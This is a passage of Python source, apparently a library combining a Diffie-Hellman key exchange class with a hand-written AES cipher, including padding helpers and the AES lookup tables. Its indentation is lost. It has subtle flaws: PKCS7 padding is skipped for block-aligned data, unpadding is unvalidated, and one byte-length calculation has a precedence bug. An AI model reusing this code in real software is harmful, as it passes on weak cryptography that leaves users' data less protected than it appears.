Since a safe prime is used, verify that the Legendre symbol == 1
"""
if(otherKey > 2 and otherKey < self.prime - 1):
if(pow(otherKey, (self.prime - 1)//2, self.prime) == 1):
return True
return False
def genSecret(self, privateKey, otherKey):
"""
Check to make sure the public key is valid, then combine it with the
private key to generate a shared secret.
"""
if(self.checkPublicKey(otherKey) is True):
sharedSecret = pow(otherKey, privateKey, self.prime)
return sharedSecret
else:
raise Exception("Invalid public key.")
def genKey(self, otherKey):
"""
Derive the shared secret, then hash it to obtain the shared key.
"""
self.sharedSecret = self.genSecret(self.privateKey, otherKey)
# Convert the shared secret (int) to an array of bytes in network order
# Otherwise hashlib can't hash it.
try:
_sharedSecretBytes = self.sharedSecret.to_bytes(
len(bin(self.sharedSecret))-2 // 8 + 1, byteorder="big")
except AttributeError:
_sharedSecretBytes = str(self.sharedSecret)
s = hashlib.sha256()
s.update(bytes(_sharedSecretBytes))
self.key = s.digest()
def getKey(self):
"""
Return the shared secret key
"""
return self.key
def _compact_word(word):
return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3]
def _string_to_bytes(text):
return list(ord(c) for c in text)
def _bytes_to_string(binary):
return "".join(chr(b) for b in binary)
def _concat_list(a, b):
return a + b
def to_bufferable(binary):
return binary
def _get_byte(c):
return ord(c)
# Python 3 compatibility
try:
xrange
except Exception:
xrange = range
# Python 3 supports bytes, which is already an array of integers
def _string_to_bytes(text):
if isinstance(text, bytes):
return text
return [ord(c) for c in text]
# In Python 3, we return bytes
def _bytes_to_string(binary):
return bytes(binary)
# Python 3 cannot concatenate a list onto a bytes, so we bytes-ify it first
def _concat_list(a, b):
return a + bytes(b)
def to_bufferable(binary):
if isinstance(binary, bytes):
return binary
return bytes(ord(b) for b in binary)
def _get_byte(c):
return c
def append_PKCS7_padding(data):
if (len(data) % 16) == 0:
return data
else:
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
def strip_PKCS7_padding(data):
if len(data) % 16 != 0:
raise ValueError("invalid length")
pad = _get_byte(data[-1])
if pad <= 16:
return data[:-pad]
else:
return data
class AES(object):
'''Encapsulates the AES block cipher.
You generally should not need this. Use the AESModeOfOperation classes
below instead.'''
# Number of rounds by keysize
number_of_rounds = {16: 10, 24: 12, 32: 14}
# Round constant words
rcon = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91]
# S-box and Inverse S-box (S is for Substitution)
S = [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
Si = [0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb, 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb, 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e, 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25, 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92, 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84, 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06, 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b, 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73, 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e, 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b, 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4, 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f, 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef, 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
# Transformations for encryption
T1 = [0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d, 0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554, 0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d, 0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a, 0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87, 0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b, 0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea, 0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b, 0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a, 0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f, 0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108, 0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f, 0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e, 0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5, 0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d, 0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f, 0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e, 0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb, 0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce, 0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497, 0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c, 0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed, 0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b, 0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a, 0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16, 0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594, 0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81, 0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3, 0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a, 0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504, 0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163, 0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d, 0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f, 0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739, 0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47, 0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395, 0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f, 0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883, 0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c, 0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76, 0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e, 0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4, 0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6, 0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b, 0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7, 0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0, 0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25, 0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818, 0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72, 0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651, 0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21, 0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85, 0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa, 0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12, 0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0, 0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9, 0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133, 0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7, 0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920, 0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a, 0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17, 0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8, 0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11, 0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a]
T2 = [0xa5c66363, 0x84f87c7c, 0x99ee7777, 0x8df67b7b, 0x0dfff2f2, 0xbdd66b6b, 0xb1de6f6f, 0x5491c5c5, 0x50603030, 0x03020101, 0xa9ce6767, 0x7d562b2b, 0x19e7fefe, 0x62b5d7d7, 0xe64dabab, 0x9aec7676, 0x458fcaca, 0x9d1f8282, 0x4089c9c9, 0x87fa7d7d, 0x15effafa, 0xebb25959, 0xc98e4747, 0x0bfbf0f0, 0xec41adad, 0x67b3d4d4, 0xfd5fa2a2, 0xea45afaf, 0xbf239c9c, 0xf753a4a4, 0x96e47272, 0x5b9bc0c0, 0xc275b7b7, 0x1ce1fdfd, 0xae3d9393, 0x6a4c2626, 0x5a6c3636, 0x417e3f3f, 0x02f5f7f7, 0x4f83cccc, 0x5c683434, 0xf451a5a5, 0x34d1e5e5, 0x08f9f1f1, 0x93e27171, 0x73abd8d8, 0x53623131, 0x3f2a1515, 0x0c080404, 0x5295c7c7, 0x65462323, 0x5e9dc3c3, 0x28301818, 0xa1379696, 0x0f0a0505, 0xb52f9a9a, 0x090e0707, 0x36241212, 0x9b1b8080, 0x3ddfe2e2, 0x26cdebeb, 0x694e2727, 0xcd7fb2b2, 0x9fea7575, 0x1b120909, 0x9e1d8383, 0x74582c2c, 0x2e341a1a, 0x2d361b1b, 0xb2dc6e6e, 0xeeb45a5a, 0xfb5ba0a0, 0xf6a45252, 0x4d763b3b, 0x61b7d6d6, 0xce7db3b3, 0x7b522929, 0x3edde3e3, 0x715e2f2f, 0x97138484, 0xf5a65353, 0x68b9d1d1, 0x00000000, 0x2cc1eded, 0x60402020, 0x1fe3fcfc, 0xc879b1b1, 0xedb65b5b, 0xbed46a6a, 0x468dcbcb, 0xd967bebe, 0x4b723939, 0xde944a4a, 0xd4984c4c, 0xe8b05858, 0x4a85cfcf, 0x6bbbd0d0, 0x2ac5efef, 0xe54faaaa, 0x16edfbfb, 0xc5864343, 0xd79a4d4d, 0x55663333, 0x94118585, 0xcf8a4545, 0x10e9f9f9, 0x06040202, 0x81fe7f7f, 0xf0a05050, 0x44783c3c, 0xba259f9f, 0xe34ba8a8, 0xf3a25151, 0xfe5da3a3, 0xc0804040, 0x8a058f8f, 0xad3f9292, 0xbc219d9d, 0x48703838, 0x04f1f5f5, 0xdf63bcbc, 0xc177b6b6, 0x75afdada, 0x63422121, 0x30201010, 0x1ae5ffff, 0x0efdf3f3, 0x6dbfd2d2, 0x4c81cdcd, 0x14180c0c, 0x35261313, 0x2fc3ecec, 0xe1be5f5f, 0xa2359797, 0xcc884444, 0x392e1717, 0x5793c4c4, 0xf255a7a7, 0x82fc7e7e, 0x477a3d3d, 0xacc86464, 0xe7ba5d5d, 0x2b321919, 0x95e67373, 0xa0c06060, 0x98198181, 0xd19e4f4f, 0x7fa3dcdc, 0x66442222, 0x7e542a2a, 0xab3b9090, 0x830b8888, 0xca8c4646, 0x29c7eeee, 0xd36bb8b8, 0x3c281414, 0x79a7dede, 0xe2bc5e5e, 0x1d160b0b, 0x76addbdb, 0x3bdbe0e0, 0x56643232, 0x4e743a3a, 0x1e140a0a, 0xdb924949, 0x0a0c0606, 0x6c482424, 0xe4b85c5c, 0x5d9fc2c2, 0x6ebdd3d3, 0xef43acac, 0xa6c46262, 0xa8399191, 0xa4319595, 0x37d3e4e4, 0x8bf27979, 0x32d5e7e7, 0x438bc8c8, 0x596e3737, 0xb7da6d6d, 0x8c018d8d, 0x64b1d5d5, 0xd29c4e4e, 0xe049a9a9, 0xb4d86c6c, 0xfaac5656, 0x07f3f4f4, 0x25cfeaea, 0xafca6565, 0x8ef47a7a, 0xe947aeae, 0x18100808, 0xd56fbaba, 0x88f07878, 0x6f4a2525, 0x725c2e2e, 0x24381c1c, 0xf157a6a6, 0xc773b4b4, 0x5197c6c6, 0x23cbe8e8, 0x7ca1dddd, 0x9ce87474, 0x213e1f1f, 0xdd964b4b, 0xdc61bdbd, 0x860d8b8b, 0x850f8a8a, 0x90e07070, 0x427c3e3e, 0xc471b5b5, 0xaacc6666, 0xd8904848, 0x05060303, 0x01f7f6f6, 0x121c0e0e, 0xa3c26161, 0x5f6a3535, 0xf9ae5757, 0xd069b9b9, 0x91178686, 0x5899c1c1, 0x273a1d1d, 0xb9279e9e, 0x38d9e1e1, 0x13ebf8f8, 0xb32b9898, 0x33221111, 0xbbd26969, 0x70a9d9d9, 0x89078e8e, 0xa7339494, 0xb62d9b9b, 0x223c1e1e, 0x92158787, 0x20c9e9e9, 0x4987cece, 0xffaa5555, 0x78502828, 0x7aa5dfdf, 0x8f038c8c, 0xf859a1a1, 0x80098989, 0x171a0d0d, 0xda65bfbf, 0x31d7e6e6, 0xc6844242, 0xb8d06868, 0xc3824141, 0xb0299999, 0x775a2d2d, 0x111e0f0f, 0xcb7bb0b0, 0xfca85454, 0xd66dbbbb, 0x3a2c1616]
T3 = [0x63a5c663, 0x7c84f87c, 0x7799ee77, 0x7b8df67b, 0xf20dfff2, 0x6bbdd66b, 0x6fb1de6f, 0xc55491c5, 0x30506030, 0x01030201, 0x67a9ce67, 0x2b7d562b, 0xfe19e7fe, 0xd762b5d7, 0xabe64dab, 0x769aec76, 0xca458fca, 0x829d1f82, 0xc94089c9, 0x7d87fa7d, 0xfa15effa, 0x59ebb259, 0x47c98e47, 0xf00bfbf0, 0xadec41ad, 0xd467b3d4, 0xa2fd5fa2, 0xafea45af, 0x9cbf239c, 0xa4f753a4, 0x7296e472, 0xc05b9bc0, 0xb7c275b7, 0xfd1ce1fd, 0x93ae3d93, 0x266a4c26, 0x365a6c36, 0x3f417e3f, 0xf702f5f7, 0xcc4f83cc, 0x345c6834, 0xa5f451a5, 0xe534d1e5, 0xf108f9f1, 0x7193e271, 0xd873abd8, 0x31536231, 0x153f2a15, 0x040c0804, 0xc75295c7, 0x23654623, 0xc35e9dc3, 0x18283018, 0x96a13796, 0x050f0a05, 0x9ab52f9a, 0x07090e07, 0x12362412, 0x809b1b80, 0xe23ddfe2, 0xeb26cdeb, 0x27694e27, 0xb2cd7fb2, 0x759fea75, 0x091b1209, 0x839e1d83, 0x2c74582c, 0x1a2e341a, 0x1b2d361b, 0x6eb2dc6e, 0x5aeeb45a, 0xa0fb5ba0, 0x52f6a452, 0x3b4d763b, 0xd661b7d6, 0xb3ce7db3, 0x297b5229, 0xe33edde3, 0x2f715e2f, 0x84971384, 0x53f5a653, 0xd168b9d1, 0x00000000, 0xed2cc1ed, 0x20604020, 0xfc1fe3fc, 0xb1c879b1, 0x5bedb65b, 0x6abed46a, 0xcb468dcb, 0xbed967be, 0x394b7239, 0x4ade944a, 0x4cd4984c, 0x58e8b058, 0xcf4a85cf, 0xd06bbbd0, 0xef2ac5ef, 0xaae54faa, 0xfb16edfb, 0x43c58643, 0x4dd79a4d, 0x33556633, 0x85941185, 0x45cf8a45, 0xf910e9f9, 0x02060402, 0x7f81fe7f, 0x50f0a050, 0x3c44783c, 0x9fba259f, 0xa8e34ba8, 0x51f3a251, 0xa3fe5da3, 0x40c08040, 0x8f8a058f, 0x92ad3f92, 0x9dbc219d, 0x38487038, 0xf504f1f5, 0xbcdf63bc, 0xb6c177b6, 0xda75afda, 0x21634221, 0x10302010, 0xff1ae5ff, 0xf30efdf3, 0xd26dbfd2, 0xcd4c81cd, 0x0c14180c, 0x13352613, 0xec2fc3ec, 0x5fe1be5f, 0x97a23597, 0x44cc8844, 0x17392e17, 0xc45793c4, 0xa7f255a7, 0x7e82fc7e, 0x3d477a3d, 0x64acc864, 0x5de7ba5d, 0x192b3219, 0x7395e673, 0x60a0c060, 0x81981981, 0x4fd19e4f, 0xdc7fa3dc, 0x22664422, 0x2a7e542a, 0x90ab3b90, 0x88830b88, 0x46ca8c46, 0xee29c7ee, 0xb8d36bb8, 0x143c2814, 0xde79a7de, 0x5ee2bc5e, 0x0b1d160b, 0xdb76addb, 0xe03bdbe0, 0x32566432, 0x3a4e743a, 0x0a1e140a, 0x49db9249, 0x060a0c06, 0x246c4824, 0x5ce4b85c, 0xc25d9fc2, 0xd36ebdd3, 0xacef43ac, 0x62a6c462, 0x91a83991, 0x95a43195, 0xe437d3e4, 0x798bf279, 0xe732d5e7, 0xc8438bc8, 0x37596e37, 0x6db7da6d, 0x8d8c018d, 0xd564b1d5, 0x4ed29c4e, 0xa9e049a9, 0x6cb4d86c, 0x56faac56, 0xf407f3f4, 0xea25cfea, 0x65afca65, 0x7a8ef47a, 0xaee947ae, 0x08181008, 0xbad56fba, 0x7888f078, 0x256f4a25, 0x2e725c2e, 0x1c24381c, 0xa6f157a6, 0xb4c773b4, 0xc65197c6, 0xe823cbe8, 0xdd7ca1dd, 0x749ce874, 0x1f213e1f, 0x4bdd964b, 0xbddc61bd, 0x8b860d8b, 0x8a850f8a, 0x7090e070, 0x3e427c3e, 0xb5c471b5, 0x66aacc66, 0x48d89048, 0x03050603, 0xf601f7f6, 0x0e121c0e, 0x61a3c261, 0x355f6a35, 0x57f9ae57, 0xb9d069b9, 0x86911786, 0xc15899c1, 0x1d273a1d, 0x9eb9279e, 0xe138d9e1, 0xf813ebf8, 0x98b32b98, 0x11332211, 0x69bbd269, 0xd970a9d9, 0x8e89078e, 0x94a73394, 0x9bb62d9b, 0x1e223c1e, 0x87921587, 0xe920c9e9, 0xce4987ce, 0x55ffaa55, 0x28785028, 0xdf7aa5df, 0x8c8f038c, 0xa1f859a1, 0x89800989, 0x0d171a0d, 0xbfda65bf, 0xe631d7e6, 0x42c68442, 0x68b8d068, 0x41c38241, 0x99b02999, 0x2d775a2d, 0x0f111e0f, 0xb0cb7bb0, 0x54fca854, 0xbbd66dbb, 0x163a2c16]
T4 = [0x6363a5c6, 0x7c7c84f8, 0x777799ee, 0x7b7b8df6, 0xf2f20dff, 0x6b6bbdd6, 0x6f6fb1de, 0xc5c55491, 0x30305060, 0x01010302, 0x6767a9ce, 0x2b2b7d56, 0xfefe19e7, 0xd7d762b5, 0xababe64d, 0x76769aec, 0xcaca458f, 0x82829d1f, 0xc9c94089, 0x7d7d87fa, 0xfafa15ef, 0x5959ebb2, 0x4747c98e, 0xf0f00bfb, 0xadadec41, 0xd4d467b3, 0xa2a2fd5f, 0xafafea45, 0x9c9cbf23, 0xa4a4f753, 0x727296e4, 0xc0c05b9b, 0xb7b7c275, 0xfdfd1ce1, 0x9393ae3d, 0x26266a4c, 0x36365a6c, 0x3f3f417e, 0xf7f702f5, 0xcccc4f83, 0x34345c68, 0xa5a5f451, 0xe5e534d1, 0xf1f108f9, 0x717193e2, 0xd8d873ab, 0x31315362, 0x15153f2a, 0x04040c08, 0xc7c75295, 0x23236546, 0xc3c35e9d, 0x18182830, 0x9696a137, 0x05050f0a, 0x9a9ab52f, 0x0707090e, 0x12123624, 0x80809b1b, 0xe2e23ddf, 0xebeb26cd, 0x2727694e, 0xb2b2cd7f, 0x75759fea, 0x09091b12, 0x83839e1d, 0x2c2c7458, 0x1a1a2e34, 0x1b1b2d36, 0x6e6eb2dc, 0x5a5aeeb4, 0xa0a0fb5b, 0x5252f6a4, 0x3b3b4d76, 0xd6d661b7, 0xb3b3ce7d, 0x29297b52, 0xe3e33edd, 0x2f2f715e, 0x84849713, 0x5353f5a6, 0xd1d168b9, 0x00000000, 0xeded2cc1, 0x20206040, 0xfcfc1fe3, 0xb1b1c879, 0x5b5bedb6, 0x6a6abed4, 0xcbcb468d, 0xbebed967, 0x39394b72, 0x4a4ade94, 0x4c4cd498, 0x5858e8b0, 0xcfcf4a85, 0xd0d06bbb, 0xefef2ac5, 0xaaaae54f, 0xfbfb16ed, 0x4343c586, 0x4d4dd79a, 0x33335566, 0x85859411, 0x4545cf8a, 0xf9f910e9, 0x02020604, 0x7f7f81fe, 0x5050f0a0, 0x3c3c4478, 0x9f9fba25, 0xa8a8e34b, 0x5151f3a2, 0xa3a3fe5d, 0x4040c080, 0x8f8f8a05, 0x9292ad3f, 0x9d9dbc21, 0x38384870, 0xf5f504f1, 0xbcbcdf63, 0xb6b6c177, 0xdada75af, 0x21216342, 0x10103020, 0xffff1ae5, 0xf3f30efd, 0xd2d26dbf, 0xcdcd4c81, 0x0c0c1418, 0x13133526, 0xecec2fc3, 0x5f5fe1be, 0x9797a235, 0x4444cc88, 0x1717392e, 0xc4c45793, 0xa7a7f255, 0x7e7e82fc, 0x3d3d477a, 0x6464acc8, 0x5d5de7ba, 0x19192b32, 0x737395e6, 0x6060a0c0, 0x81819819, 0x4f4fd19e, 0xdcdc7fa3, 0x22226644, 0x2a2a7e54, 0x9090ab3b, 0x8888830b, 0x4646ca8c, 0xeeee29c7, 0xb8b8d36b, 0x14143c28, 0xdede79a7, 0x5e5ee2bc, 0x0b0b1d16, 0xdbdb76ad, 0xe0e03bdb, 0x32325664, 0x3a3a4e74, 0x0a0a1e14, 0x4949db92, 0x06060a0c, 0x24246c48, 0x5c5ce4b8, 0xc2c25d9f, 0xd3d36ebd, 0xacacef43, 0x6262a6c4, 0x9191a839, 0x9595a431, 0xe4e437d3, 0x79798bf2, 0xe7e732d5, 0xc8c8438b, 0x3737596e, 0x6d6db7da, 0x8d8d8c01, 0xd5d564b1, 0x4e4ed29c, 0xa9a9e049, 0x6c6cb4d8, 0x5656faac, 0xf4f407f3, 0xeaea25cf, 0x6565afca, 0x7a7a8ef4, 0xaeaee947, 0x08081810, 0xbabad56f, 0x787888f0, 0x25256f4a, 0x2e2e725c, 0x1c1c2438, 0xa6a6f157, 0xb4b4c773, 0xc6c65197, 0xe8e823cb, 0xdddd7ca1, 0x74749ce8, 0x1f1f213e, 0x4b4bdd96, 0xbdbddc61, 0x8b8b860d, 0x8a8a850f, 0x707090e0, 0x3e3e427c, 0xb5b5c471, 0x6666aacc, 0x4848d890, 0x03030506, 0xf6f601f7, 0x0e0e121c, 0x6161a3c2, 0x35355f6a, 0x5757f9ae, 0xb9b9d069, 0x86869117, 0xc1c15899, 0x1d1d273a, 0x9e9eb927, 0xe1e138d9, 0xf8f813eb, 0x9898b32b, 0x11113322, 0x6969bbd2, 0xd9d970a9, 0x8e8e8907, 0x9494a733, 0x9b9bb62d, 0x1e1e223c, 0x87879215, 0xe9e920c9, 0xcece4987, 0x5555ffaa, 0x28287850, 0xdfdf7aa5, 0x8c8c8f03, 0xa1a1f859, 0x89898009, 0x0d0d171a, 0xbfbfda65, 0xe6e631d7, 0x4242c684, 0x6868b8d0, 0x4141c382, 0x9999b029, 0x2d2d775a, 0x0f0f111e, 0xb0b0cb7b, 0x5454fca8, 0xbbbbd66d, 0x16163a2c]
# Transformations for decryption
T5 = [0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96, 0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393, 0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25, 0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f, 0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1, 0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6, 0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da, 0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844, 0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd, 0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4, 0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45, 0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94, 0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7, 0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a, 0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5, 0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c, 0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1, 0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a, 0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75, 0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051, 0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46, 0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff, 0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77, 0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb, 0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000, 0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e, 0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927, 0x0a0fd964, 